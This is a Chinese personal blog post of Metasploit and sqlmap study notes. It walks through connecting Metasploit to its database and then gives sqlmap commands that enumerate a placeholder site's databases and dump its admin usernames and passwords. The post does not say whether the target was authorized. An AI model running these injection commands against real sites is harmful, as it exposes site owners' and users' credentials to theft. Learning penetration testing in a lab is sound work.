metasploit渗透测试学习笔记（二）

现在已经在看那本metasploit渗透测试指南了，虽然书是12年的，但还是有很多知识，当然很多疑惑，毕竟我在用的是kali。。。版本有很大改变。。好多不准！，还有就是连接数据库的问题，看了网上答案，应该先看看database.yml这个文件（我猜的，大神求教）

cat /opt/metasploit/config/database.yml

已显示密码了。

接着看看它用那个端口：

netstat -tnpl | grep postgres

而后：

db_connect msf3:4bfedc2@localhost：端口/msf3

在看看状态

db_status

ok 已连接

呵呵~~~~~

后来又跟着大神xiao136xx（网易博客）传送门大神的大神，学了点sqlmap，的确长知识了不少,如下：

sqlmap --url http：//www.xxxx.asp?id=xx --dbs

 --url 目标url。

--dbs 枚举数据库。

然后枚举表。

表名已出来。

然后枚举数据库表列：

看username，password已出来，所以现在正式开始猜解：

--dump转储，也就是下载的意思吧。

为什么

resumed：dba902f69c09ceb8

resumed：jx_lc_ztxx

呢？

因为我之前测试过了-。-！

sqlmap --url http：//www.xxxx.asp?id=xx -D 数据库 -T admin -C ”password，username“ --dump
 
  
OK了
 
  
上面就是登录名和密码了，别问我解密不出来，我特么也没办法。。。呵呵。
 
  
好吧，还有为什么背景图不一样呢，那是因为前一个在backtrack5下面测试，另一个在kali啦。。。。
 
  
我好无聊额（我知道没人看的zzz）。
 
  
 
好累，最近一直在测试学习metasploit，但我好厌恶我总是没什么进步，一天都呆在实验室，一天都在测试，没什么效果啊，我要崩溃了。 
  
 
  
旁边小伙伴问我，你最孤独的时候是什么？
 
  
呵呵，我早已习惯了。。。。。。。。。。。--！ ：）
 
  
 
 
  
雄关漫道真如铁，万水千山不等闲啊！
 
  
不说了，我去泡杯奶茶压压惊。：）